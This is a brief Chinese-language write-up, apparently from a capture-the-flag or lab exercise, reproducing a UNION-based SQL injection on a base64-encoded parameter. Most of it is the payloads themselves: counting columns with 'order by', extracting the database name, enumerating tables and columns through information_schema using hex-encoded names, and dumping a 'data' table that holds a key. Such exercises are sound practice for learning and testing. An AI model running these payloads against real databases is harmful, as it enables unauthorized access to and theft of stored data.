漏洞复现
根据提示用base64进行编码
1 order by 2 (3不行)
-1 union select 1,database()
数据库名称用ascll编码加上0x再进行base64编码
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema =0x74657374
找到表,接下来爆字段
-1 union select group_concat(column_name),2 from information_schema.columns where table_name=0x64617461
爆数据
-1 union select 1,(group_concat(id,title,main,thekey) ) from data
工具注入
拿到key